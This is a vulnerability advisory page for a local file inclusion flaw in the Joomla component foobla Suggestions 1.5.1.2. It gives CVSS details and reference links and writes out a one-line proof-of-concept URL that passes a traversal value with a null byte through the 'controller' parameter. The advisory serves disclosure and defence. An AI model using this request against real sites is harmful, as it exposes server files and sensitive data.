Joomla Component Foobla Suggestions Local File Inclusion

2010-08-02 / 2010-08-03
Credit: Chip D3 Bi0s
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

----------------------------------------------------------------------------------------- Joomla Component Foobla Suggestions Local File Inclusion ----------------------------------------------------------------------------------------- Author : Chip D3 Bi0s Email : chipdebios[alt+64]gmail.com Date : April 08, 2010 Critical Lvl : Moderate Impact : Exposure of sensitive information Where : From Remote --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : foobla Suggestions version : 1.5.1.2 Developer : foobla License : GPL type : Commercial Date Added : Dec 21, 2009 Demo : http://demo.foobla.com/foobla-suggestions-joomla Download : http://foobla.com/products/featured-joomla-extensions/foobla-suggestions-for-joomla.html Description : Have you ever used Uservoice? Would you like to have something similar on Joomla but with unlimited features and no monthly fee? The foobla Suggestions allows you to collect ideas, suggestions, and votes from your cutomers. For more information check out the features list, screenshots, and demo. FEATURES * GNU/GPL license. Purchase, install in unlimited domains and get professional support. * AJAX base for frontend. * Allow to import ideas from Uservoice account. * Bad words filter. * Export database to XML format. * Import to database from XML backup file. * Flexible user permissioning. * Easy to implement, ONE-CLICK Installation package: 01 component (backend & frontend) + 02 plugin + 01 module. * Express Install Tools in backend. * One-Click upgrade to newer version. * Translation Manager built-in. --------------------------------------------------------------------------- Poc/Exploit: ~~~~~~~~~ http://127.0.0.1/[path]/index.php?option=com_foobla_suggestions&controller=[LFI]%00 +++++++++++++++++++++++++++++++++++++++ #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++

References:

http://xforce.iss.net/xforce/xfdb/57660
http://www.vupen.com/english/advisories/2010/1844
http://www.securityfocus.com/bid/39341
http://www.exploit-db.com/exploits/12120
http://packetstormsecurity.org/1004-exploits/joomlafoobla-lfi.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top